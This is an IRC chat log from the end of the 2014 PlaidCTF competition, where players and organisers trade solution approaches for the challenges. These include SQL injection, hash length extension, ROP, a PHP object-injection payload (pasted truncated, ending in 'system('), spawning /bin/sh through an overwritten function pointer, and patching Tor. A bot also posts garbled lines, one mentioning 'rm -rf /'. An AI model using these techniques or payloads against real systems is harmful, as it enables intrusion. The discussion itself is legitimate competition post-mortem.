(16:01:04) (lavish) congrats ppp!
(16:01:10) (tomcr00se) clockish: omg duh :P...nice
(16:01:11) (lavish) classy chals as usual
(16:01:14) (Ymgve) comex: but openssl wasn't included, just gcc?
(16:01:17) (bool101) Grats 0xffa
(16:01:20) (+dickoff) I'm looking forward to people's writeups
(16:01:21) (@mserrano) tomcr00se: or use a code object!
(16:01:21) (ius) Thanks PPP!
(16:01:24) qUit: (haoz) (6e9f6937@gateway/web/freenode/ip.110.159.105.55) Quit: Page closed
(16:01:25) (Adran) Thanks for the ctf guys
(16:01:25) (robbje) GG, nice CTF, thank you for hosting
(16:01:26) (@cai_) congrats to the winners :)
(16:01:27) (ius) esp. bronies was insane
(16:01:28) (ius) :D
(16:01:28) (+dickoff) ius: congrats!
(16:01:29) (lavish) and grats to the winners
(16:01:30) (@cai_) GG all
(16:01:30) (comex) Ymgve: if you compile openssl with that gcc, it gets backdoored
(16:01:31) (_blasty_) BRONIES.
(16:01:33) (someone_) what was the wallet id for mtpox
(16:01:36) (jagger_) gg - really nic challenges - a lot of fun instead of going through 100 iterations of guessing
(16:01:38) (ius) so much xss/mem corr
(16:01:41) (Guest71506) gg
(16:01:42) (iago-x86) I can't believe we didn't solve the tor level... we have two tor devs on our team! :)
(16:01:42) (Ymgve) comex: that's the theory but we could never find the backdoor
(16:01:44) (+awesie) dkohlbre: there was password to unlock the device, that password was the key
(16:01:46) (arthurdent) anyone want to make a googledox with all the writeups or something?
(16:01:49) (valis) wow, that was intensive - congrats 0xffa on bronies part 2
(16:01:50) (_blasty_) My captcha approach was suboptimal. I kept refreshing till I got 'Rarity'.
(16:01:52) jOin: (Rexperience7) (~Rex@unaffiliated/rexperience7)
(16:01:53) (+tylerni7) iago-x86: hahahaha
(16:01:54) (Adran) what was the answer to polygon since I kept getting gatway issues?
(16:01:54) (_blasty_) Im gonna watch all of MLP now.
(16:01:56) (@mserrano) _blasty_: lol
(16:01:58) (sven) :D
(16:02:01) (iago-x86) _blasty_: haha, I did basically the same
(16:02:02) (lavish) someone_: I used group_concat and dumped the whole stuff
(16:02:03) (Adran) my little brony
(16:02:04) (tomcr00se) polygon was sql injection
(16:02:04) (+tylerni7) _blasty_: pony captcha is best captcha
(16:02:06) qUit: (__vitor__) (806f3006@gateway/web/freenode/ip.128.111.48.6) Ping timeout: 240 seconds
(16:02:06) (Rexperience7) GJ Everyone
(16:02:07) (@mserrano) _blasty_: Ricky would refresh until he got Princess Celestia
(16:02:07) (+dickoff) iago-x86: what team are you on?
(16:02:09) (comex) Ymgve: i compiled openssl with the evil compiler and stock gcc 4.8.2, bindiff, easy to find the difference
(16:02:09) (dkohlbre) awesie: yes i know, i couldn't figure out how to get the password, I unlocked the device without it :P
(16:02:10) (Rexperience7) it was fun
(16:02:17) (Valodim) pony captcha kept me going ♥
(16:02:23) (sssssssss) what bug in web800?
(16:02:23) jOin: (zzoru) (6e23254c@gateway/web/freenode/ip.110.35.37.76)
(16:02:23) (iago-x86) dickoff: "Nate Delivers Breakfast" or "ndb"
(16:02:28) (whois) what is bronies2??
(16:02:29) (+awesie) dkohlbre: yeah, that is why i made the key the password :)
(16:02:30) (geobot) we used in the password
(16:02:35) (sven) sssssssss: wait for our writeup :)
(16:02:39) (+awesie) dkohlbre: you could get the password from the nvram
(16:02:41) (sssssssss) sure
(16:02:43) (comex) (first i tried bindiffing the compiler but it was compiled with two different compilers itself or something)
(16:02:46) (clockish) sven: we're all waiting for your writeup :)
(16:02:47) (@mserrano) whois: xss -> arb. file read -> mem corruption -> flag
(16:02:53) jOin: (cimmi_) (1f2d47df@gateway/web/freenode/ip.31.45.71.223)
(16:02:54) (+ricky) sssssssss: XSS in ponies site, stack buffer overflow leading to XSS in otp checking binary on login site, combine to steal cookie on login site
(16:02:57) (+awesie) dkohlbre: blackberry only uses sha1 to hash their device password :(
(16:02:58) (dkohlbre) awesie: thats what I figured,but I couldn't find any docs on it, and manual inspection wasn't turning it up
(16:03:00) (Ymgve) SHA1 hash of password was in mvram for blackberry
(16:03:04) (Ymgve) nvram
(16:03:13) (+ricky) sssssssss: Then there was an internal web server with more memory corruption to exploit
(16:03:14) (whois) memory couuption on /home/bigson/bigson binary?
(16:03:14) (Adran) mserrano: what was polygon? i saw the injection stuff, but then gateway sploded. :(
(16:03:14) qUit: (Guest68736) (8d644bcc@gateway/web/freenode/ip.141.100.75.204) Quit: Page closed
(16:03:18) (abuss) Adran, http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
(16:03:20) (Guest26684) arthurdent: ctftime.org will can index em all, submit them there - https://ctftime.org/event/119/tasks/
(16:03:21) ([CISSP]HoLyVieR) For WhatApp, what SQL where we suppose to use that fits in 64 caracters ?
(16:03:21) (tomcr00se) and what was weeee?
(16:03:25) (Ymgve) also: fun fact, if you delete the nvram file, you can access the phone and read the message without any password
(16:03:26) (iago-x86) Adran: Poly was a blind sqli
(16:03:26) (tomcr00se) Adran: sql injection
(16:03:28) (Beched) hey anybody
(16:03:34) (@mserrano) Adran: blind sql
(16:03:34) (mongo12) stack buffer overflow leading to XSS? how so?
(16:03:35) (Beched) pls show flag for web200
(16:03:38) (ronbarrey) looking for soultion to web150
(16:03:40) (Adran) okay. yeah got to the sql injection. then gatway ate me.
(16:03:41) (Adran) cool
(16:03:42) (dkohlbre) Ymgve: did you find docs on how its stored? or just find a sha1 hash and roll with it
(16:03:46) (iZsh) ricky: dont sploil the writeups ;-)
(16:03:48) (iZsh) for bronies2
(16:03:52) (_blasty_) Im eh, not looking forward to do the full bronies writeup
(16:03:52) (_blasty_) lol
(16:03:58) (Adran) ronbarrey: sql injection to get flag
(16:03:58) (geobot) sql injection of rm -rf / sven: don't die
(16:03:59) (lavish) 23:01 < abuss> Writeup on web 100: http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
(16:04:02) (lavish) change the page title
(16:04:03) (lavish) :P
(16:04:05) (Adran) abuss: thanks
(16:04:05) (Ymgve) dkohlbre: deleted original nvram, set a new password with "test", looked thru nvram for suspicious areas
(16:04:08) (rray) what was mtpox
(16:04:13) qUit: (Hero2Morow) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(16:04:17) (Ymgve) the rest was thanks to google(tm) hash brute forcing
(16:04:19) (tomcr00se) so i had rop on harry_potter...what next?
(16:04:21) (abuss) lavish, <abuss> (ignore the nuit du hack title, I don't know how2jekyll)
(16:04:22) (abuss) hehehe
(16:04:22) (dkohlbre) Ymgve: did the exact same things... I'll take another look at my diff
(16:04:25) (dkohlbre) thanks
(16:04:26) ([CISSP]HoLyVieR) rray: mtbox what hash length extension + sqli
(16:04:28) (lavish) abuss: ooops
(16:04:29) (+ricky) iZsh: Sure thing, looking forward to reading
(16:04:33) (iago-x86) rray: mtpox was hash extension attack
(16:04:39) (iago-x86) google it, you'll find my blog as the second result. :)
(16:04:47) (yyyyyyy) so what was 20? :D
(16:04:49) (Beched) halphow2js FLAG pls, need to compare
(16:05:04) (bool101) yes what was the solution to harry_potter
(16:05:07) (rray) ahh, i was nowhere near solving mtpox :P
(16:05:09) (abuss) tomcr00se, how the hell did you get halphow2js so fast? 0.0
(16:05:12) (Ymgve) sooo was graphs supposed to be so easy to solve? (all private key vertices had a suspiciously low degree)
(16:05:16) (@mserrano) Ymgve: yes
(16:05:19) (tomcr00se) abuss: i have mad js skills :P
(16:05:21) (wtbw) Ymgve: treat it as a system of linear equations
(16:05:23) (@mserrano) Ymgve: you can just do Gaussian elimination and get a flag
(16:05:24) (abuss) well, better question, how were you suppoesd to get halphow2js :P
(16:05:24) (|x_x|) Time to start doing some writeups on what few I could do.
(16:05:27) (Valodim) lol graphs was awesome
(16:05:32) pArt: (javex) (javex@2a01:7e00::f03c:91ff:fe70:76f8)
(16:05:33) (Ymgve) wtbw: fuck that, count degrees, see where the jump is
(16:05:34) (clockish) Beched: w00t_i_are_mastar_web_hackar
(16:05:37) (Valodim) privkey.add(node[0])
(16:05:40) (Valodim) bam
(16:05:41) (mongo12) how do you get XSS out of the stack overflow, for bronies1? wtf
(16:05:42) (robbje) any writeup on zfs?
(16:05:45) mOde: (cai_) sets (-o cai_)
(16:05:47) (whois) mserrano // how possible memory corruption bigson?
(16:05:48) (lavish) iago-x86: lol thank you! I used your hash_extender to solve mtpox!
(16:05:48) (Beched) clockish: thanks
(16:05:48) qUit: (jinblack) (
[email protected]) Remote host closed the connection
(16:05:51) (tomcr00se) also, i shamefully failed at hudak
(16:05:52) (Ymgve) there was like no vertices with degrees between 20 and 30
(16:05:53) (upb) [CISSP]HoLyVieR: but what do you extend b:0; to to get anything other than bool(false) ? :P
(16:05:56) (lavish) iago-x86: that program rulez
(16:05:57) (zoku) who wrote ezhp?
(16:06:02) (@mserrano) zoku: I did
(16:06:05) (tomcr00se) mserrano: i am so bad at your problems, paris and hudak
(16:06:05) (sven) heh, zfs was fun. aDR4eA solved that one in ~10 minutes :D
(16:06:07) (wtbw) Ymgve: oh, sneaky!
(16:06:08) jOin: (Rinko) (3d812a67@gateway/web/cgi-irc/kiwiirc.com/ip.61.129.42.103)
(16:06:15) (Beched) was there any flag like flag{_0r1g1nally_t1m3_1$_running_0ut_} ??
(16:06:16) (geobot) i need to add more during the flag hack all the doors at once and sweaty bodies everywhere aswell
(16:06:16) (keidii) .
(16:06:17) (+cai_) >.>
(16:06:17) (zoku) ah, was I almost there mserrano?
(16:06:19) ([CISSP]HoLyVieR) upb: The string is reversed before being hashed
(16:06:22) (@mserrano) zoku: yes
(16:06:23) (robbje) sven: how? i didn't get it after 10h
(16:06:23) (wtbw) Ymgve: not a generic break though!
(16:06:27) (dkohlbre) where was the write/overflow in kappa? I had like 3 crash bugs and some arbitrary reads... but no writes
(16:06:28) wtbw idealist
(16:06:31) (+dickoff) tomcr00se: paris was Frisk0's
(16:06:31) (whois) mserrano // bigson binary has corruption vuln?
(16:06:32) (@mserrano) tomcr00se: paris isn't mine - I did test it though
(16:06:36) (zoku) what system is it running on mserrano?
(16:06:36) (iago-x86) When I saw it was hash extension, I considered adding a bug to hash_extender ;)
(16:06:38) nIck: (Mawekl|DrgnS) is now known as (Mawekl)
(16:06:38) (jix) using a SAT solver also worked fine to recover the private key for a given graph pubkey
(16:06:40) (+ricky) dickoff: kappa was type confusion (dickoff wrote it)
(16:06:42) (zoku) really curious why it's not working
(16:06:42) (iago-x86) I'm curious how many downloads I got this weekend
(16:06:42) (keidii) anyone can spoil details on bbos ?
(16:06:44) (wtbw) Paris was nice
(16:06:46) (Ymgve) wtbw: yeah, I thought about if there was a generic solution but too busy to follow it up
(16:06:47) ([CISSP]HoLyVieR) upb: and b:1; ... garbage .... b;0 deserialize give "true"
(16:06:49) (+ricky) dickoff: Sorry, that as for dkohlbre
(16:06:55) (lavish) iago-x86: lol
(16:06:59) (upb) [CISSP]HoLyVieR: oh hmm
(16:07:01) (@mserrano) zoku: 64-bit debian ami, using the i386 libraries from multiarch
(16:07:01) (Ymgve) is there a way to solve rendezvous without recompiling Tor?
(16:07:02) (rray) so.. whatscat, what was the solution?
(16:07:02) (Frisk0) I'm glad you liked Paris :)
(16:07:03) (dkohlbre) ricky: yeah, i just wasn't finding any writes I could control, ah well
(16:07:09) mOde: (mserrano) sets (+v Frisk0)
(16:07:14) jOin: (D3AdCa7) (d220a27e@gateway/web/freenode/ip.210.32.162.126)
(16:07:16) (tomcr00se) rray: sqli in username, or probably dns magic
(16:07:19) (AnthraX101) Serialize all the things!
(16:07:20) (choppers) dkohlbre: write to the art, overwrite the inspect() pointer to be system()
(16:07:28) (wtbw) Paris is the sort of thing that makes me want to code better analysis tools
(16:07:29) (+dickoff) dkohlbre: fill up your pokemon with kakuna, go catch a charizard, the art struct will now overflow the function pointer.
(16:07:30) (iago-x86) Finding system() was the hard part
(16:07:33) (zoku) ah, thanks mserrano
(16:07:33) (iago-x86) Well, not really
(16:07:34) (dkohlbre) choppers: goddammit im an idiot, I did that
(16:07:36) (oceanx_) damn I just solved nightmares :<
(16:07:38) (iago-x86) I just sucked. :)
(16:07:40) (D3AdCa7) how to solve web800 stage1.....
(16:07:41) (wtbw) because I'm sure it could e done much faster
(16:07:43) (wtbw) *be
(16:07:44) (+awesie) btw, i will post a blog post about the website issues and how we resolved them at some point
(16:07:49) (dkohlbre) choppers: literally did that and forgot it gets run
(16:07:51) (KT) what was the solution of "parlor"?
(16:07:52) (abuss) tomcr00se, dns magic?
(16:07:53) (@mserrano) did anyone like tiffany?
(16:07:53) jOin: (shabgrd) (~mostafa@unaffiliated/shabgard)
(16:07:55) (@mserrano) tiffany was my favorite
(16:07:56) (iago-x86) awesie: That's awesome! Make sure you cc: shmoocon :)
(16:07:57) (choppers) dkohlbre: if you name your pokemon /bin/sh you get system("/bin/sh")
(16:08:01) ([CISSP]HoLyVieR) tomcr00se: What SQLi did you use for WhatApp, the only table I could leak with 64 caracters was comments ?
(16:08:02) (tomcr00se) awesie: harry_potter after you have rop?
(16:08:09) (keidii) anyone solve BBOS here ??
(16:08:10) (Ymgve) KT: server lies, nonce is used repeatedly, so hash extension
(16:08:10) (+tylerni7) <3 awesie and cai_ for making the site work
(16:08:12) (zoku) mserrano: tiffany was fucked
(16:08:14) (zoku) mserrano: did you write that too?
(16:08:17) (@mserrano) yes
(16:08:18) (tomcr00se) [CISSP]HoLyVieR: i guessed (select * from flag) :P
(16:08:18) (okami41) mserrano: tiffany was a lot of fun, it took me forever though!
(16:08:22) (ryan-c) https://gist.github.com/anonymous/10602398#file-pctf2014-rsa450 < rsa writeup
(16:08:22) ([int3]romansoft) <sven> heh, zfs was fun. aDR4eA solved that one in ~10 minutes :D -> wtf!!! How did you find key.xor_encrypted amd xor_key contents? Offsets of them?
(16:08:23) (wtbw) mserrano: well I said "what about 'breakfast at tiffany's'?"
(16:08:25) (mak`) what was correct solution to zfs?
(16:08:26) (+awesie) tomcr00se: you should've been able to just use system(...) to run commands
(16:08:28) (ryan-c) tylerni7: ^^^
(16:08:30) jOin: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796)
(16:08:31) (Ymgve) keidii: SHA1 hashes of device password in nvram
(16:08:31) (okami41) i kept wanting to set breakpoints
(16:08:35) (mak`) without brute?
(16:08:39) (@mserrano) I wrote ezhp, tiffany, mtpox, kpop, hudak, moscow, wheee, twenty, mult. is hard
(16:08:40) (keidii) Ymgve , och
(16:08:40) (spq) hy, thanks for the nice ctf
(16:08:41) ([CISSP]HoLyVieR) tomcr00se: oh wow ... :/
(16:08:41) (tomcr00se) awesie: but how to find libc?
(16:08:42) (dkohlbre) choppers: yeah I had that, godammit I was so tired and looking for a write, somehow ignored I was writing a function pointer that i knew
(16:08:50) (upb) grrrrr wtf
(16:08:51) (bool101) wow mserrano nice
(16:08:52) (dkohlbre) choppers: ah well ty
(16:08:54) (+awesie) tomcr00se: you could leak libc address
(16:09:05) (tomcr00se) before socket shutdown?
(16:09:07) (iago-x86) mserrano: I solvee ezhp, mtpox, and kpop :)
(16:09:17) (ryan-c) tomcr00se: did you write an attack for rsa from scratch or use the c poc by the people that wrote that paper?
(16:09:19) (tomcr00se) i could either leak libc address OR use libc address
(16:09:21) (Ymgve) mserrano: was there some agreement to use city names for VM tasks? :)
(16:09:22) (bool101) liked that problem awesie
(16:09:25) (+awesie) tomcr00se: don't shutdown the socket, you could get the argument to new() to be -1
(16:09:27) (rray) iago-x86: how did you solve kpop? wob was too hard
(16:09:27) (tomcr00se) ryan-c: lol poc of course
(16:09:28) qUit: (Rinko) (3d812a67@gateway/web/cgi-irc/kiwiirc.com/ip.61.129.42.103) Client Quit
(16:09:31) (zoku) iago-x86: what was your ezhp solution?
(16:09:32) (@mserrano) Ymgve: I named both of them :P
(16:09:33) (foundation) do you guys know who runs chandler tor node ?
(16:09:38) (+awesie) tomcr00se: if you have a string of the form: AAAA...PASSWORD
(16:09:42) (Ymgve) paris was nasty
(16:09:45) (+houqp_) foundation: yeah
(16:09:49) (abuss) How did nightmare work? I did try read/write to /proc/self/mem but it gave me i/o error
(16:09:50) (@mserrano) paris was a great problem
(16:09:50) (iago-x86) rray: kpop = take advantage of preg_replace()'s /e extension
(16:09:51) (foundation) he's gonna be scraching his head over this weekend i guess :)
(16:09:58) (tomcr00se) awesie: ahh, i missed that, and new will throw
(16:09:59) (+houqp_) foundation: we contacted the operator before hand :)
(16:10:03) (+awesie) tomcr00se: yep
(16:10:08) (wtbw) I really liked that Paris was "clean", other than SEH usage
(16:10:10) (foundation) houqp_: cool
(16:10:11) (wtbw) no bs, just complication
(16:10:11) (+awesie) w/in 7
(16:10:12) (blagh) how did mtpox work? I never managed to pull it off
(16:10:13) (+awesie) ugh
(16:10:14) (rray) iago-x86: i was trying to exploit that at one point, but i couldn't control what went into preg_replace
(16:10:16) (iago-x86) zoku: It was basically owning a linked list, I think?
(16:10:18) (rray) i guess i'll wait for the writeup
(16:10:19) (spq) abuss: i made it with python bytecode to x86 shellcode
(16:10:23) (+houqp_) foundation: they were very happy with that :)
(16:10:23) (@mserrano) blagh: hash extension -> sql injection
(16:10:24) (ryan-c) tomcr00se: it took a while for me to think to look for a poc, people who write papers rarely release code
(16:10:25) qUit: (shabgard) (~mostafa@unaffiliated/shabgard) Ping timeout: 245 seconds
(16:10:29) (iago-x86) rray: You can control it via deserializing $_COOKIE['lyrics']
(16:10:35) (rray) 0_0
(16:10:41) (KT) <Ymgve>: but you dont know the highest 28 bits of the hash, so how do you extend it?
(16:10:44) (@mserrano) rray: look up stefan esser's slides on POP chains
(16:10:47) (Ymgve) KT: brute force
(16:10:49) qUit: (criple_ripper) (
[email protected]) Quit: KVIrc 4.2.0 Equilibrium http://www.kvirc.net/
(16:10:51) (ryan-c) anyone else here get parlor?
(16:10:52) (rray) ... i did that, but i did it wrong haha
(16:10:58) (iago-x86) Haha
(16:11:05) (iago-x86) I actually used a whiteboard to draw the object structure
(16:11:06) (KT) Ymgve: ok, true, nice :D
(16:11:07) (iago-x86) Good times
(16:11:09) iago-x86 signs off
(16:11:11) (Ymgve) KT: do two guesses in sequence then use brute force locally to find the remaining bits
(16:11:15) (iago-x86) (metaphorically)
(16:11:15) (@mserrano) Tzo2OiJMeXJpY3MiOjI6e3M6OToiACoAbHlyaWNzIjtzOjQ6ImFzZGYiO3M6NzoiACoAc29uZyI7Tzo0OiJTb25nIjo0OntzOjk6IgAqAGxvZ2dlciI7Tzo2OiJMb2dnZXIiOjE6e3M6MTI6IgAqAGxvZ3dyaXRlciI7TzoxNDoiTG9nV3JpdGVyX0ZpbGUiOjI6e3M6MTE6IgAqAGZpbGVuYW1lIjtzOjg6InNvbWVzaGl0IjtzOjk6IgAqAGZvcm1hdCI7TzoxMzoiTG9nRmlsZUZvcm1hdCI6Mjp7czoxMDoiACoAZmlsdGVycyI7YToxOntpOjA7TzoxMjoiT3V0cHV0RmlsdGVyIjoyOntzOjE1OiIAKgBtYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNDoiACoAcmVwbGFjZW1lbnQiO3M6MzU6InN5c3RlbSg
(16:11:16) (rray) mserrano: i was looking at the article he wrote, in retrospect i was actually quite close :P
(16:11:17) (abuss) spq, nice, got a writeup? I tried to build bytecode that would call os.system but I couldn't get import to work
(16:11:22) (@mserrano) importing that
(16:11:24) (@mserrano) oh shit that got truncated
(16:11:25) (@mserrano) oh well
(16:11:27) (@mserrano) would get flag
(16:11:34) (whois) who know bbos ?
(16:11:37) (deject3d_) where writeups
(16:11:39) (foundation) was there an easy way of solving g++ , those c++ templates ?
(16:11:42) (abuss) ryan-c, curious how? I spent an hour or so on that but couldn't find any way to predict output
(16:11:46) (@mserrano) http://paste2.org/Nn46z87k <- import this on kpop, obtain flag
(16:11:47) (zoku) iago-x86: yea, had to overflow one buffer to write to the linked list
(16:11:47) (spq) abuss: i'll see
(16:11:47) (Ymgve) whois: SHA1 hashes of device password in nvram
(16:11:47) (abuss) it wasn't a lcg as far as I could tell
(16:11:49) (tomcr00se) foundation: dynamically
(16:11:52) (comex) foundation: i tried z3 but it didn't work :p
(16:11:58) (ryan-c) abuss: hash length extension attack
(16:12:00) (blagh) mserrano: Well, I was going down a completely wrong path
(16:12:10) (whois) Ymgve // Thx, !
(16:12:10) (abuss) god dammit I really need to figure out how those work
(16:12:11) (abuss) haha
(16:12:12) (ryan-c) abuss: you can get the last 100 bits of the md5
(16:12:19) (yyyyyyy) sooooo..... guys.... anyone solved the almost-feistel cipher?
(16:12:19) (ryan-c) abuss: extend it blind
(16:12:19) (zardus) great ctf, guys
(16:12:21) (marcoscars02) ryan-c, awesome write
(16:12:24) (@mserrano) yyyyyyy: :)
(16:12:27) (+tylerni7) btw, who solved RSA? curious how you did it?
(16:12:28) (@mserrano) yyyyyyy: Slide attack
(16:12:31) (NK_) never saw a ctftime update as quickly
(16:12:32) (NK_) :)
(16:12:32) (foundation) tomcr00se: dynamically ? i tried to mess with recursion depth , to figure out something ...
(16:12:33) (+tylerni7) apparently there was code posted :(
(16:12:34) (zardus) my favorite was harry potter :-)
(16:12:35) ([int3]romansoft) please, offsets of key.xor_encrypted and xor_key (zfs)???
(16:12:38) (@mserrano) yyyyyyy: you can reverse a single double-round in <= 4096 iterations
(16:12:39) (+tylerni7) I wanted people to solve themselves
(16:12:42) (tomcr00se) tylerni7: the code from the paper
(16:12:43) (ryan-c) abuss: and brute force the other 28 bits to find something that resulted in a matching second hash
(16:12:44) (abuss) tylerni7, kmowery
(16:12:48) (+tylerni7) tomcr00se: damn
(16:12:50) (@mserrano) yyyyyyy: and then using ~512 plaintexts you can reliably get a slid pair
(16:12:53) (+tylerni7) tomcr00se: I didn't know about the code D:
(16:12:58) (+tylerni7) someone else linked me to it
(16:12:59) (abuss) nice okay
(16:13:04) (ryan-c) marcoscars02: It's a quick shitty writeup, lol will make a better one later
(16:13:07) (tomcr00se) tylerni7: wait you really wrote that attack?
(16:13:08) (fuzyll) tylerni7: tomcr00se: what paper?
(16:13:11) (@mserrano) tomcr00se: yeah, he did
(16:13:16) (+tylerni7) tomcr00se: yeah I have it in python
(16:13:17) (@mserrano) it's pretty cool
(16:13:18) (marcoscars02) awesome code ryan-c
(16:13:20) (marcoscars02) :O
(16:13:28) (sven) i think segher wrote his own code too after reading the paper
(16:13:29) (ryan-c) fuzyll: http://cseweb.ucsd.edu/~hovav/papers/hs09.html
(16:13:29) (geobot) yeah ucsd revealed themselves
(16:13:35) (+tylerni7) sven: :) good
(16:13:40) (sven) not sure though :)
(16:13:42) (+tylerni7) geobot: yes.. they did
(16:13:43) (@mserrano) sven: how did DS get wheee?
(16:13:45) (+tylerni7) o.0
(16:13:48) (yyyyyyy) mserrano, I actually didn't know that attack... :/ thanks for explaining
(16:13:50) (@mserrano) sven: did you guys actually do the 26**3 requests?
(16:13:55) (ryan-c) I got part way through writing my own code from the paper too
(16:13:58) jOin: (irctc736) (806f3006@gateway/web/freenode/ip.128.111.48.6)
(16:14:10) (abuss) tylerni7, the best part is that our crypto guy didn't see that link
(16:14:14) (tomcr00se) what was the wheee solution?
(16:14:15) qUit: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796) Remote host closed the connection
(16:14:18) (abuss) and spent quite a while writing from scratch
(16:14:20) (mak`) zfs anyone? ;]
(16:14:21) (@mserrano) tomcr00se: http://www.theamazingking.com/crypto-slide.php
(16:14:26) (abuss) and then noticed it after submitting flag :P
(16:14:31) qUit: (Im11Plus1) (
[email protected]) Remote host closed the connection
(16:14:31) (dkohlbre) tylerni7: the best part is that he IS HOVAV'S GRAD STUDENT
(16:14:35) (abuss) ^^^^
(16:14:36) (sven) mserrano: uh.. i know that someone implemented the slide attack, dunno how many requests we sent though
(16:14:39) jOin: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796)
(16:14:42) (@mserrano) sven: ah cool
(16:14:42) qUit: (deject3d_) (
[email protected]) Quit: Computer has gone to sleep.
(16:14:51) (@mserrano) someone was gonna do 26**3 blocks
(16:14:55) (sven) :D
(16:14:59) (ryan-c) abuss: he wrote a solver from the paper then found the source?
(16:15:02) (@mserrano) but you can do it in < 512; I got it with 256
(16:15:05) (+tylerni7) dkohlbre: haha whatt
(16:15:07) (@mserrano) (aka a single request)
(16:15:13) (tomcr00se) grr, yea, i figured it was something like this, but i was too tired this morning
(16:15:17) (whois) whats tor(rendezvous) prob?
(16:15:18) (+tylerni7) that's geat
(16:15:27) (sssssssss) how to solve halphow2js?
(16:15:28) (dkohlbre) tylerni7: yeah, he grabbed the paper, wrote a new impl, and THEN noticed the impl by hovav
(16:15:33) (@mserrano) dkohlbre: LOL
(16:15:34) (+tylerni7) dkohlbre: that makes me so happy
(16:15:37) pArt: (Rexperience7) (~Rex@unaffiliated/rexperience7)
(16:15:43) (dkohlbre) sooo now we have 2
(16:15:45) (clockish) :D
(16:15:46) (+tylerni7) lol
(16:15:52) (asmoday) HEY whats the next CTF
(16:15:54) (mathiasbynens) halphow2js write-up https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js
(16:15:56) (whois) using chandler router to connect onion ?
(16:15:59) (marcoscars02) asmoday, sqli
(16:15:59) (+tylerni7) asmoday: ctftime.org
(16:16:00) (marcoscars02) xD
(16:16:11) (asmoday) so that site is up to date
(16:16:17) (mathiasbynens) heartbleed write-up: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/heartbleed
(16:16:18) (+tylerni7) yeah
(16:16:19) (Ymgve) How do you specify a router to use as a rendezvous point?
(16:16:22) (wtbw) thanks again guys :)
(16:16:28) (foundation) whois: yes, you had to patch the tor source to make sure it uses chandler as rendezvous point
(16:16:29) (ryan-c) whois: you have to modify tor in a couple places - first to handle an unencryped list of intro points, then to force using chandler as a rend point, then to include beef in the rend cookie
(16:16:39) (mathiasbynens) multiplication is hard write-up: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/multiplication-is-hard
(16:16:42) (ryan-c) Ymgve: you have to modify the tor source code
(16:16:50) (asmoday) multiplication is hard, oh the memories
(16:16:51) (foundation) Ymgve: source patching
(16:16:51) (Ymgve) ryan-c: was afraid of that
(16:16:51) (whois) oh ,,
(16:16:55) qUit: (wtbw) (~wtbw@unaffiliated/wtbw)
(16:16:57) (jix) ryan-c: unencrypted list of intro points?
(16:16:59) (ryan-c) it was a pain in the arse
(16:17:00) (jix) ryan-c: I didn't have to do that
(16:17:06) (pipecork) mathiasbynens: lol
(16:17:07) (ryan-c) jix: hm
(16:17:10) (jix) only chandler as rend point and beef as cookie
(16:17:14) (mathiasbynens) pipecork: the real tough ones :')
(16:17:15) (jix) but it was painful
(16:17:15) (mathiasbynens) please add links to your write-ups here https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014
(16:17:24) (jix) especially chandler as rend point
(16:17:31) (abuss) oh my god that jshalp
(16:17:35) (abuss) 0.0
(16:17:54) (tomcr00se) i loved jshalp
(16:17:54) (dkohlbre) ok time to go home, ty ppp
(16:17:58) (sven) freya annoyed me the most. especially 'cause all i did was recompile openssh in the end to make it work :<
(16:18:03) (+awesie) dkohlbre: thanks for playing :)
(16:18:08) (sdjakl) re wheeeee, i wrote the slide attack. we used 256 blocks
(16:18:21) (sdjakl) (for whoever was asking sven)
(16:18:23) (mathiasbynens) tomcr00se: did you solve it the same way? https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js#readme
(16:18:27) (clockish) abuss: do you know how to js
(16:18:28) (abuss) clockish, so what did mystop do? I spent HOURS trying to reverse and black box it
(16:18:29) (sven) mserrano: ^--
(16:18:32) (ryan-c) anyone do a writeup of curlcore?
(16:18:33) (abuss) clockish, LOLNO
(16:18:38) (clockish) abuss: i don't either
(16:18:42) (abuss) it was like the collatz function
(16:18:45) (abuss) but with an exception
(16:18:45) (@mserrano) tomcr00se: anyone else wondering: https://gist.github.com/mserrano/54465a80ffe75739d2ee
(16:18:47) (abuss) that had an exception
(16:18:50) (+tylerni7) ryan-c: use something to search for aes key schedule
(16:18:54) (@mserrano) sven: sdjakl: cool
(16:18:54) (mathiasbynens) clockish, abuss: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js#readme
(16:18:55) (+tylerni7) then cbc
(16:18:56) (+tylerni7) :P
(16:19:01) (ryan-c) tylerni7: goddamnit
(16:19:02) (ryan-c) really?
(16:19:03) (clockish) abuss: yeah, exactly. I just modified the collatz function with some shit
(16:19:10) (ryan-c) I threw aeskeyfind at it first thing
(16:19:13) (@mserrano) (that gist uses 512 blocks, but you can use 256 and it will work with very high probability)
(16:19:14) (ryan-c) and got an aes key
(16:19:14) (geobot) ah, thought it will win 8 to search for aes key schedule
(16:19:23) (@mserrano) (csol is just a C implementation of the cipher)
(16:19:25) (+tylerni7) ryan-c: yeah, aeskeyfind may not work, but some tools do
(16:19:37) (tomcr00se) too tired to even read that :P
(16:19:45) (marcoscars02) steg writeup?
(16:19:46) (marcoscars02) :DD
(16:19:50) (Pitr_) why was the memory layout in curlcores dump different from gnutls_int.h ?
(16:19:53) (clockish) mathiasbynens: yeah, good write up, that's basically the intended solution :)
(16:19:57) (sdjakl) a
(16:19:59) (+tylerni7) marcoscars02: randomize the palette
(16:20:01) (ryan-c) aeskeyfind gave me 68f946e9c1fd339eec04fc048e651ba7642ee8df2519aaf308ab567f7e4bc231
(16:20:03) (+tylerni7) then reopen image
(16:20:07) (+tylerni7) ryan-c: there are 2 keys
(16:20:07) (ryan-c) next to some asn1 structures
(16:20:08) (Beched) lol people say that penthackon team cheats like ASSholes asking ppl for hints or flags, pretending they are some poor small team in the bottom of scoreboard. And they post FAKE flags in PM LOL
(16:20:12) (+tylerni7) one for encrypting, one for decrypting
(16:20:19) (+tylerni7) (each side of the connection)
